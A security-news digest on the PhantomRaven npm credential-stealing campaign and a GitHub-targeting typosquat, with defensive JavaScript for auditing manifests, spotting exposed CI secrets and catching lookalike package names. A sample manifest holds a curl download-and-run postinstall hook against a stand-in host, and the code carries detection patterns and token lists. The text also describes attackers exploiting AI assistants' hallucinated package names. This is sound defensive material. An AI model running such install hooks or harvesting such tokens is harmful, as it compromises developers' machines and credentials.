PhantomRaven npm credential harvesting campaign leverages invisible dependencies
Summary
PhantomRaven is an ongoing npm credential-harvesting campaign, codenamed by Koi Security, that has been active since August 2025. At least 126 npm packages were infected, with more than 86,000 downloads in total, and as of October 29, 2025 at least 80 of them were still live on the registry. The packages steal npm tokens, GitHub credentials, and CI/CD secrets from developers and build pipelines worldwide. The malicious code is not in the published package itself: each package declares a Remote Dynamic Dependency (RDD), a dependency fetched from an attacker-controlled URL at install time instead of from the npm registry, so scanners that inspect only what the registry holds see nothing malicious. Because the attacker controls that URL, the server can serve harmless code at first and push a malicious version later. Publishing to npm is low-friction, and package lifecycle scripts run arbitrary code on the installing machine, so the payload executes as soon as a developer or CI job runs the install; it then scans environment variables for tokens and email addresses, gathers information about the CI/CD environment to gauge the target's value, and exfiltrates what it finds. Package names are chosen by slopsquatting: registering plausible-sounding names that AI coding assistants hallucinate, so that developers who follow the assistant's suggestion install the attacker's package. A separate report on November 11, 2025 describes "@acitons/artifact", a typosquat of the legitimate "@actions/artifact" package: versions 4.0.12 to 4.0.17 carried a post-install hook that downloads and runs malware, the package was downloaded 47,405 times, and the payload specifically targets repositories owned by the GitHub organization, indicating an attack aimed at GitHub itself.
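The two npm features the summary describes, dependencies pulled from a remote URL and lifecycle scripts that run at install time, are both visible in a package's manifest before anything is installed. The script below is an added example written for this page (it is not code from Koi Security, npm, or any of the cited articles): it audits a package.json for dependency specs that npm would fetch from outside the registry and for install hooks, and marks hooks that contain download-and-run commands. The package names, URL and commands in the sample manifest are invented.

```javascript
// Added example: audit a package.json for the two npm features PhantomRaven
// relies on. Not from the Koi Security report or from npm's own tooling.

// Dependency specs that npm resolves outside the registry. A spec such as
// "https://host/pkg.tgz" is fetched from that host at install time, so the
// registry never holds (or scans) the code it contains.
const REMOTE_SPEC = /^(https?:\/\/|git(\+(ssh|https?|file))?:\/\/|git@|github:|gitlab:|bitbucket:|gist:)/i;

// Lifecycle scripts that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Commands a download-and-run hook typically contains.
const FETCH_PATTERNS = [/\bcurl\b/i, /\bwget\b/i, /https?:\/\//i, /\bnode\s+-e\b/i, /\bchmod\s+\+x\b/i];

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditManifest(manifest) {
  const findings = [];
  const sections = ['dependencies', 'devDependencies', 'optionalDependencies', 'peerDependencies'];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(manifest[section] || {})) {
      if (typeof spec === 'string' && REMOTE_SPEC.test(spec)) {
        findings.push({ kind: 'remote-dependency', section, name, spec });
      }
    }
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (!cmd) continue;
    const fetches = FETCH_PATTERNS.some((re) => re.test(cmd));
    findings.push({ kind: fetches ? 'install-hook-fetches' : 'install-hook', hook, cmd });
  }
  return findings;
}

// Constructed sample manifest modelled on the pattern described above.
// The package names, host and commands are invented for the example.
const SAMPLE_MANIFEST = {
  name: 'example-helper',
  version: '1.0.3',
  dependencies: {
    lodash: '^4.17.21',
    'unused-helper': 'http://example.invalid/packages/unused-helper.tgz',
  },
  scripts: {
    test: 'node test.js',
    postinstall: 'curl -s https://example.invalid/h -o /tmp/h && chmod +x /tmp/h && /tmp/h',
  },
};

for (const finding of auditManifest(SAMPLE_MANIFEST)) {
  console.log(JSON.stringify(finding));
}
```

Run it against a manifest before installing, or over every package.json under node_modules after a dry-run install. The cheapest hardening is to stop lifecycle scripts from running at all on CI runners and workstations (`npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc) and to re-enable them only for the handful of packages that genuinely need a build step; `npm query ":attr(scripts, [postinstall])"` lists installed packages that declare a postinstall hook.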
Timeline
- 29.10.2025 16:00 · 4 articles
  PhantomRaven npm credential harvesting campaign discovered
  Koi Security disclosed the campaign, active since August 2025: at least 126 npm packages with more than 86,000 downloads, of which at least 80 were still live on the registry on October 29. The packages use Remote Dynamic Dependencies (RDD), dependencies fetched from an attacker-controlled URL at install time rather than from the registry, so the malicious code never sits in the published package and the server can serve harmless code first and a malicious version later. Package names are chosen by slopsquatting, registering plausible-sounding names that AI assistants hallucinate; some also impersonate GitLab or Apache tools. On install, a lifecycle script collects tokens for npm, GitHub Actions, GitLab, Jenkins, and CircleCI, searches environment variables for email addresses, profiles the CI/CD environment to gauge the target's value, and exfiltrates over HTTP GET, HTTP POST, or WebSocket connections. A later report (11.11.2025) describes "@acitons/artifact", a typosquat of GitHub's "@actions/artifact", first uploaded on October 29, 2025 and downloaded 47,405 times; versions 4.0.12 to 4.0.17 carried a postinstall hook that downloads and runs a "harness" binary, which checks GITHUB_ environment variables and targets repositories owned by the GitHub organization, indicating an attack aimed at GitHub itself. A second package, "8jfiesaf83", with similar functionality recorded 1,016 downloads before it was removed.
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
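Everything the timeline entry says the payload harvests (npm, GitHub Actions, GitLab, Jenkins and CircleCI tokens, plus email addresses) is read from the environment of the process that runs `npm install`. A useful pre-install check is therefore to ask what that environment would hand to an install script. The following is an added example written for this page, not code from any of the cited reports: it lists environment variables whose name or value shape marks them as credentials, and variables whose value looks like an email address, and offers a guard that refuses to proceed when anything worth stealing is exposed. The variable names, token prefixes and the sample environment are the example's own assumptions; the sample values are invented.

```javascript
// Added example: before running install scripts, report which environment
// variables a PhantomRaven-style payload would find. Not from the cited reports.

// Variable names that commonly carry long-lived credentials in CI (assumed list).
const KNOWN_SECRET_NAMES = new Set([
  'NPM_TOKEN', 'NODE_AUTH_TOKEN', 'GITHUB_TOKEN', 'GH_TOKEN',
  'GITLAB_TOKEN', 'CI_JOB_TOKEN', 'JENKINS_TOKEN', 'JENKINS_API_TOKEN',
  'CIRCLE_TOKEN', 'CIRCLECI_TOKEN',
]);
const GENERIC_SECRET_NAME = /(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|PRIVATE_KEY)/i;
// Token prefixes that identify the issuer even when the variable name is bland.
const TOKEN_VALUE_PREFIX = /^(ghp_|gho_|ghu_|ghs_|github_pat_|npm_|glpat-)/;
const EMAIL = /[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}/i;

// Returns { secrets: [{name, reasons, preview}], emails: [names] }.
// Only a short prefix of each value is kept so the report itself is safe to log.
function exposedSecrets(env) {
  const secrets = [];
  const emails = [];
  for (const [name, value] of Object.entries(env)) {
    if (typeof value !== 'string' || value === '') continue;
    const reasons = [];
    if (KNOWN_SECRET_NAMES.has(name)) reasons.push('known-ci-secret-name');
    else if (GENERIC_SECRET_NAME.test(name)) reasons.push('secret-like-name');
    if (TOKEN_VALUE_PREFIX.test(value)) reasons.push('token-shaped-value');
    if (reasons.length > 0) secrets.push({ name, reasons, preview: value.slice(0, 4) + '...' });
    if (EMAIL.test(value)) emails.push(name);
  }
  return { secrets, emails };
}

// Guard for a CI step: install scripts should only run where nothing
// worth stealing is in the environment. Returns true when the check passes.
function assertNoExposedSecrets(env) {
  const { secrets } = exposedSecrets(env);
  if (secrets.length > 0) {
    const names = secrets.map((s) => s.name).join(', ');
    throw new Error(`refusing to run install scripts with secrets in the environment: ${names}`);
  }
  return true;
}

// Constructed sample environment; every value is invented.
const SAMPLE_ENV = {
  PATH: '/usr/bin:/bin',
  CI: 'true',
  GITHUB_ACTIONS: 'true',
  GITHUB_REPOSITORY: 'example-org/example-repo',
  GITHUB_TOKEN: 'ghs_000000000000000000000000000000000000',
  NPM_TOKEN: 'npm_000000000000000000000000000000000000',
  GIT_AUTHOR_EMAIL: 'dev@example.com',
  BUILD_NUMBER: '42',
};

console.log(JSON.stringify(exposedSecrets(SAMPLE_ENV), null, 2));
```

In practice the fix the report points to is scoping: pass publish and registry tokens only to the single step that needs them rather than as job-wide environment, run `npm install` before any secret is injected, and treat every token that was present on a runner that installed one of the affected packages as compromised and rotate it.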
Information Snippets
- The PhantomRaven campaign has been active since August 2025.
  First reported: 29.10.2025 16:00 · 3 sources, 3 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
- The malware targets npm tokens, GitHub credentials, and CI/CD secrets.
  First reported: 29.10.2025 16:00 · 3 sources, 4 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- At least 126 npm packages have been infected, with over 86,000 downloads in total.
  First reported: 29.10.2025 16:00 · 3 sources, 4 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The attack uses Remote Dynamic Dependencies (RDD) to hide malicious code.
  First reported: 29.10.2025 16:00 · 3 sources, 4 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The campaign exploits AI hallucinations to create plausible-sounding package names.
  First reported: 29.10.2025 16:00 · 3 sources, 4 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- As of October 29, 2025, at least 80 of the infected packages remain active on the registry.
  First reported: 29.10.2025 16:00 · 3 sources, 4 articles
  - Npm Malware Uses Invisible Dependencies to Infect Dozens of Packages — www.infosecurity-magazine.com — 29.10.2025 16:00
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The infected packages have been downloaded more than 86,000 times in total.
  First reported: 29.10.2025 18:26 · 2 sources, 3 articles
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The malware collects tokens for npm, GitHub Actions, GitLab, Jenkins, and CircleCI.
  First reported: 29.10.2025 18:26 · 2 sources, 3 articles
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The malware exfiltrates data over three channels: HTTP GET requests, HTTP POST requests, and WebSocket connections.
  First reported: 29.10.2025 18:26 · 2 sources, 3 articles
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The malware profiles the infected device to gauge the target's value and searches environment variables for email addresses.
  First reported: 29.10.2025 18:26 · 2 sources, 3 articles
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- Some of the malicious packages impersonate GitLab or Apache tools.
  First reported: 29.10.2025 18:26 · 1 source, 1 article
  - PhantomRaven attack floods npm with credential-stealing packages — www.bleepingcomputer.com — 29.10.2025 18:26
- The campaign was codenamed PhantomRaven by Koi Security.
  First reported: 30.10.2025 12:16 · 1 source, 1 article
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
- The Remote Dynamic Dependency is resolved from an externally hosted, attacker-controlled location at install time rather than from the npm registry, so the malicious code is never part of the package the registry holds and scans.
  First reported: 30.10.2025 12:16 · 1 source, 1 article
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
- Because the dependency is fetched from a URL the attacker controls, the server can return any payload: it can serve harmless code at first and switch to a malicious version later without republishing the npm package.
  First reported: 30.10.2025 12:16 · 1 source, 1 article
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
- The malware scans the developer environment for email addresses and gathers information about the CI/CD environment.
  First reported: 30.10.2025 12:16 · 1 source, 2 articles
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The threat actor uses slopsquatting: registering packages under plausible-sounding names that AI coding assistants hallucinate, so that developers who follow the assistant's suggestion install the attacker's package.
  First reported: 30.10.2025 12:16 · 1 source, 2 articles
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- Publishing to npm is low-friction, and package lifecycle scripts (such as preinstall and postinstall) execute arbitrary code on the installing machine at install time.
  First reported: 30.10.2025 12:16 · 1 source, 2 articles
  - PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs — thehackernews.com — 30.10.2025 12:16
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- A malicious npm package named "@acitons/artifact" typosquats the legitimate "@actions/artifact" package to target GitHub-owned repositories.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- Versions 4.0.12 to 4.0.17 of the package carried a post-install hook that downloads and runs malware.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The package was first uploaded on October 29, 2025, and has been downloaded 47,405 times.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The postinstall script downloads a binary named "harness" from a GitHub account that has since been removed.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The "harness" binary is an obfuscated shell script with a kill-date check: it refuses to execute after 2025-11-06 UTC, limiting the window in which the payload can be observed.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The script runs a JavaScript file named "verify.js" that checks for the presence of certain GITHUB_ environment variables and exfiltrates the collected data, encrypted, to a text file hosted on an "app.github[.]dev" subdomain.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- The malware specifically targets repositories owned by the GitHub organization, indicating a targeted attack against GitHub itself.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
- Another npm package named "8jfiesaf83" with similar functionality was identified; it recorded 1,016 downloads and is no longer available for download.
  First reported: 11.11.2025 13:55 · 1 source, 1 article
  - Researchers Detect Malicious npm Package Targeting GitHub-Owned Repositories — thehackernews.com — 11.11.2025 13:55
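The "@acitons/artifact" name differs from "@actions/artifact" by a single transposition, which is exactly the class of lookalike a dependency review can catch mechanically. The following is an added example written for this page (not code from Veracode, GitHub or any of the cited reports): it computes the optimal-string-alignment variant of Damerau-Levenshtein distance, which counts a transposition as one edit, splits scoped names into scope and base, and reports any candidate within one edit of a trusted name without being identical to it. The trusted-package list is an assumption of the example.

```javascript
// Added example: flag package names that are one edit away from a trusted
// package, so "@acitons/artifact" is caught against "@actions/artifact".
// Not from any of the cited reports.

// Optimal string alignment distance: insert, delete, substitute, or swap two
// adjacent characters, each costing 1.
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Split "@scope/name" into its parts; unscoped names get scope null.
function splitName(name) {
  const m = /^(?:(@[^/]+)\/)?([^/]+)$/.exec(name);
  return m ? { scope: m[1] || null, base: m[2] } : null;
}

// Compare a candidate against trusted package names. An exact match is fine;
// a name whose scope plus base distance is within maxDistance is reported.
// Scope and base are compared separately so "@acitons/artifact" is measured
// against "@actions/artifact" as a one-character scope change.
function findLookalikes(candidate, trusted, maxDistance = 1) {
  const c = splitName(candidate);
  if (!c) return [];
  const hits = [];
  for (const t of trusted) {
    if (t === candidate) return [];
    const p = splitName(t);
    if (!p) continue;
    const scopeDist = (c.scope || p.scope) ? osaDistance(c.scope || '', p.scope || '') : 0;
    const baseDist = osaDistance(c.base, p.base);
    if (scopeDist + baseDist <= maxDistance) {
      hits.push({ candidate, lookalike: t, scopeDistance: scopeDist, baseDistance: baseDist });
    }
  }
  return hits;
}

// Assumed allowlist of packages the project is known to depend on.
const TRUSTED_PACKAGES = ['@actions/artifact', '@actions/core', 'lodash', 'express'];

console.log(findLookalikes('@acitons/artifact', TRUSTED_PACKAGES));
```

Run it over every name in a lockfile diff before merging a dependency update. It only catches names that are near something you already trust; a slopsquatted name that an assistant invented from nothing is not near anything, so for those the complementary check is the package's age and download history in the registry metadata before the suggestion is accepted.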
Similar Happenings
Malicious npm packages targeting Windows, macOS, and Linux systems
Ten malicious npm packages were discovered that deliver an information stealer targeting Windows, macOS, and Linux systems. The packages, uploaded to the npm registry on July 4, 2025, have collectively accumulated over 9,900 downloads. The malware uses multiple layers of obfuscation and a fake CAPTCHA to evade detection and harvests credentials from system keyrings, browsers, and authentication services. The packages are still available on npm despite being reported to npm. The attack aims to steal sensitive information, including credentials and session cookies, which can provide unauthorized access to corporate resources.
GlassWorm malware targets OpenVSX, VS Code registries
The GlassWorm malware campaign has resurfaced on OpenVSX with three new VS Code extensions, downloaded over 10,000 times. The malware hides its code behind invisible Unicode characters and targets GitHub, npm, and OpenVSX account credentials as well as cryptocurrency wallet data. The campaign initially affected 49 extensions, with an estimated 35,800 downloads, a figure inflated by bots and visibility-boosting tactics. The Eclipse Foundation revoked leaked tokens and introduced security measures, but the threat actors pivoted to GitHub and have now returned to OpenVSX with updated command-and-control endpoints: a fresh transaction posted to the Solana blockchain carries the C2 endpoint from which the next-stage payload is downloaded. The attackers' server was inadvertently exposed, revealing a partial victim list spanning the United States, South America, Europe, and Asia, including a major government entity in the Middle East; Koi Security accessed the server and shared the victim data with law enforcement. The threat actor is assessed to be Russian-speaking and uses RedExt, an open-source browser-extension C2 framework, as part of its infrastructure.
Credential Phishing Campaign Using 175 Malicious npm Packages
A credential phishing campaign, codenamed Beamglea, has targeted over 135 industrial, technology, and energy companies worldwide. The campaign utilized 175 malicious npm packages, collectively downloaded 26,000 times, to host redirect scripts that lead victims to credential harvesting pages. The packages exploit npm's public registry and UNPKG's CDN to distribute HTML payloads designed to capture Microsoft credentials. The campaign leverages legitimate infrastructure to create a resilient phishing operation that is difficult to detect and mitigate. The packages do not execute malicious code upon installation, making them harder to identify. The HTML files, disguised as legitimate documents, redirect victims to phishing sites that pre-fill email fields, increasing the likelihood of successful credential theft.
Malicious 'postmark-mcp' npm package exfiltrated user emails
An unofficial npm package named 'postmark-mcp', which mimicked the official postmark-mcp project, silently stole users' emails after a malicious update. The package interfaces AI assistants with the Postmark email delivery platform so they can send email on behalf of users or applications. Version 1.0.16 added a single line of code that BCC'd every outgoing email to an address controlled by the threat actor. The malicious version was available for about a week and recorded around 1,643 downloads; researchers at Koi Security, who discovered it, estimate that some 1,500 organizations may have pulled it. Exposed data could include personal communications, password-reset requests, two-factor authentication codes, financial information, and customer details. The developer, 'phanpak', who maintains 31 other packages on npm, deleted the package after Koi Security contacted them. Users who installed it are advised to remove it immediately, rotate potentially exposed credentials, and audit all MCP servers in use.
AI-Enhanced Malware Campaign Targeting Multiple Sectors
The AI-enhanced malware campaign, dubbed EvilAI, continues to target organizations globally, with infections confirmed in multiple regions including Europe, the Americas, and the Asia, Middle East, and Africa (AMEA) region. The malware, disguised as legitimate productivity and AI-enhanced apps, has infected hundreds of victims across manufacturing, government, healthcare, technology, and retail sectors. The campaign uses various propagation methods, including newly registered websites, malicious ads, SEO manipulation, and promoted download links on forums and social media. The malware performs extensive reconnaissance, disables security products, and uses obfuscation techniques to avoid detection, acting as an initial access broker for future exploit activity. The campaign, first identified in September 2025, has been observed using AI tools to distribute malware. The malware is concealed within seemingly legitimate apps, leveraging digital signatures and realistic features to evade detection. The threat actors behind the campaign are highly capable, using sophisticated techniques to make the malware appear authentic. The malware uses NeutralinoJS to execute JavaScript code and siphon sensitive data, employing Unicode homoglyphs to bypass detection. The presence of multiple code-signing publishers suggests a shared malware-as-a-service provider or a code-signing marketplace.